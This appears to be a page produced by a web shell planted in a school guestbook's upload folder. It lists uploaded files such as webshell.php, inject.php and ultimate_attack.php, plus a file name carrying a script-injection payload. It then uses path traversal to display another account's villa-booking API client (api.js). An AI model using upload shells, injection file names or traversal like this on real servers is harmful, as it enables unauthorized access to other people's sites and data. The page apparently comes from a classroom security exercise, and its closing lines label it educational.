
Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../584683.klas4s23.mid-ica.nl/public_html/../public_html/../public_html/WI/js/api.js

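class Requests {
    /**
     * Base URL of the backend API.
     * NOTE(review): plain http — the bearer token attached by Sendrequest is sent unencrypted.
     */
    static get address() {
        return 'http://87.106.224.51:3010/api';
    }

    // internal function to send a request
    /**
     * Sends one XMLHttpRequest and resolves with the parsed JSON response body.
     * @param {string} method  HTTP method passed to xhr.open
     * @param {string} endpoint  absolute URL passed to xhr.open
     * @param {*} body  a FormData is sent as-is; anything else is JSON.stringify'd
     * @param {boolean} requiresAuth  when true, the "SessionKey" entry of sessionStorage is sent as a Bearer token
     * @returns {Promise<*>} the parsed body (any HTTP status); rejects with a string reason when
     *   no session key exists, the request errors at the network level, or the body is not valid JSON
     */
    static async Sendrequest(method, endpoint, body, requiresAuth) {
        return new Promise((resolve, reject) => {
            // Resolve the credential before opening anything so a missing key never starts a request.
            let sessionKey = null;
            if (requiresAuth) {
                sessionKey = sessionStorage.getItem("SessionKey");
                if (!sessionKey) {
                    reject("No session key found. Please log in.");

                    return;
                }
            }

            const xhr = new XMLHttpRequest();
            xhr.open(method, endpoint);

            // Remove the Content-Type header for FormData so the browser sets the multipart boundary
            if (!(body instanceof FormData)) {
                xhr.setRequestHeader("Content-Type", "application/json");
            }

            if (sessionKey) {
                xhr.setRequestHeader("Authorization", `Bearer ${sessionKey}`);
            }

            xhr.onload = () => {
                // A JSON.parse exception thrown inside the handler would be an uncaught error
                // and leave this promise pending forever; surface it as a rejection instead.
                try {
                    resolve(JSON.parse(xhr.responseText));
                } catch (parseError) {
                    reject(`Invalid JSON response (HTTP ${xhr.status}): ${parseError.message}`);
                }
            };
            // statusText is usually empty on a network failure; give callers a non-empty reason.
            xhr.onerror = () => reject(xhr.statusText || "Network error");

            xhr.send(body instanceof FormData ? body : JSON.stringify(body));
        });
    }


    // public function to send a request handling errors
    /**
     * Wraps Sendrequest so callers never see a rejection.
     * @param {string} method  HTTP method
     * @param {string} endpoint  absolute URL
     * @param {*} body  request body (see Sendrequest)
     * @param {boolean} [requiresAuth=false]  attach the session key as a Bearer token
     * @returns {Promise<*>} the parsed response, or `{ success: false, data: { Reason } }`
     *   with the rejection reason when the request could not be completed
     */
    static async request(method, endpoint, body, requiresAuth = false) {
        try {
            return await this.Sendrequest(method, endpoint, body, requiresAuth);
        }
        catch (error) {
            console.error(error);

            return { success: false, data: { Reason: error } };
        }
    }
}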

class VillaRequests extends Requests {
    /** Base URL of the villa endpoints. */
    static get address() {
        return `${super.address}/villa`;
    }

    /** Fetches every villa (no session key needed). */
    static async getVillas() {
        const url = `${this.address}/get-all`;
        return await this.request('GET', url);
    }

    /** Fetches the admin villa listing; sends the session key. */
    static async getAdminVillas() {
        const url = `${this.address}/get-all-admin`;
        return await this.request('GET', url, {}, true);
    }

    /** Fetches villas for the given ids; `ids` is sent JSON-encoded as the POST body. */
    static async getVillasByIDs(ids) {
        const url = `${this.address}/get-by-ids`;
        return await this.request('POST', url, ids);
    }

    /** Fetches one villa; `id` is sent JSON-encoded as the POST body. */
    static async getVillaByID(id) {
        const url = `${this.address}/get-by-id`;
        return await this.request('POST', url, id);
    }

    /** Fetches one villa for editing; sends the session key. */
    static async getVillaByIDEdit(id) {
        const url = `${this.address}/get-by-id-edit`;
        return await this.request('POST', url, id, true);
    }

    /** Fetches the available tags. */
    static async getTags() {
        const url = `${this.address}/get-tags`;
        return await this.request('GET', url);
    }

    /** Fetches villas matching `filters` (sent JSON-encoded as the POST body). */
    static async getVillasByFilters(filters) {
        const url = `${this.address}/get-by-filters`;
        return await this.request('POST', url, filters);
    }

    /** Deletes a villa; sends the session key. */
    static async deleteVilla(id) {
        const url = `${this.address}/delete`;
        return await this.request('POST', url, id, true);
    }

    /** Deletes one request attached to a villa; sends the session key. */
    static async deleteRequest(villaID, RequestID) {
        const url = `${this.address}/delete-request`;
        const payload = { villaID, RequestID };
        return await this.request('POST', url, payload, true);
    }

    /** Fetches the first `count` villas; `count` is sent JSON-encoded as the POST body. */
    static async getFirstVillas(count) {
        const url = `${this.address}/get-first`;
        return await this.request('POST', url, count);
    }
}


class AdminRequest extends Requests {
    /** Base URL of the admin endpoints. */
    static get address() {
        return `${super.address}/admin`;
    }

    /** Posts the credentials as `{ email, password }`; no session key is sent. */
    static async login(email, password) {
        const url = `${this.address}/login`;
        const credentials = { email, password };
        return await this.request('POST', url, credentials);
    }

    /** Asks the backend whether the stored session key is still accepted. */
    static async IsLoggedIn() {
        const url = `${this.address}/is-allowed`;
        return await this.request('GET', url, {}, true);
    }

    /** Uploads a new villa (`data` may be a FormData); sends the session key. */
    static async addVilla(data) {
        const url = `${this.address}/upload-villa`;
        return await this.request('POST', url, data, true);
    }

    /** Submits edits for an existing villa; sends the session key. */
    static async editVilla(data) {
        const url = `${this.address}/edit-villa`;
        return await this.request('POST', url, data, true);
    }
}

class MoreInfoRequest extends Requests {
    /** Base URL of the more-info endpoints. */
    static get address() {
        return `${super.address}/moreInfoRequest`;
    }

    /** Sends a visitor's information request for a villa; no session key is needed. */
    static async requestMoreInfo(villaId, email, message) {
        const url = `${this.address}/moreInfoRequest`;
        const payload = { villaId, email, message };
        return await this.request('POST', url, payload);
    }
}

class PDFRequests extends Requests {
    /** Base URL of the PDF endpoints. */
    static get address() {
        return `${super.address}/pdf`;
    }

    /** Requests the PDF for a villa; `VillaID` is sent JSON-encoded as the POST body. */
    static async generatePDF(VillaID) {
        const url = `${this.address}/get`;
        return await this.request('POST', url, VillaID);
    }
}


class ImageServer {
    /** Base URL of the static image host (plain http, separate port from the API). */
    static get address() {
        return 'http://87.106.224.51:3012/Images';
    }

    /** Absolute URL of the site logo on the image host. */
    static get Logo() {
        const logoPath = 'General/logo.png';
        return `${this.address}/${logoPath}`;
    }
}

// models
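/**
 * Escapes the five HTML-significant characters so a value can be interpolated
 * into element text or a double-quoted attribute without being parsed as markup.
 * Villa fields arrive from the API response and must not be trusted as HTML.
 * @param {*} value  coerced with String(); undefined/null render as "undefined"/"null" like the template did
 * @returns {string}
 */
function escapeHtml(value) {
    return String(value)
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#39;');
}

class SmallVilla {
    /**
     * Card model for one villa of an API listing.
     * @param {{VillaID:*, Name:*, Price:*, VillaImagePath:*, Location:*, Capacity:*, Bedrooms:*, Bathrooms:*}} villa
     *   one villa record as returned by the API
     */
    constructor(villa) {
        this.id = villa.VillaID;
        this.name = villa.Name;
        this.price = villa.Price;
        this.image = villa.VillaImagePath;
        this.location = villa.Location;
        this.capacity = villa.Capacity;
        this.bedrooms = villa.Bedrooms;
        this.bathrooms = villa.Bathrooms;
    }

    /**
     * Card markup for this villa. Every field is HTML-escaped so a crafted name,
     * location or image path cannot inject elements or attributes.
     * @returns {string}
     */
    get html() {
        const e = escapeHtml;
        // NOTE(review): id="price" repeats once per card on a listing page; kept for CSS compatibility.
        return `
        <div class="villaCard">
            <div class="imageContainer">
                <img src="${e(this.image)}" alt="Villa">
            </div>
            <div class="info">
                <div class="title">
                    <h2>${e(this.name)}</h2>
                </div>
                <div class="details">
                    <p>${e(this.location)}</p>
                    <p><img src="Assets/icons/personIcon.svg" alt="Person icon">${e(this.capacity)} personen</p>
                    <p><img src="Assets/icons/bedIcon.svg" alt="Bed icon">${e(this.bedrooms)} Slaapkamers</p>
                    <p><img src="Assets/icons/bathIcon.svg" alt="Bath icon">${e(this.bathrooms)} Badkamers</p>
                </div>
                <div class="actions">
                    <h3 id="price">€${e(this.price)},-</h3>
                    <a href="villa.html?villaID=${e(this.id)}" class="buttonLink">Bekijk</a>
                </div>
            </div>
        </div>`;
    }
}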

// Point every element carrying the "logo" class at the logo on the image host.
const logos = document.getElementsByClassName('logo');

for (const logo of logos) {
    logo.src = ImageServer.Logo;
}

⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!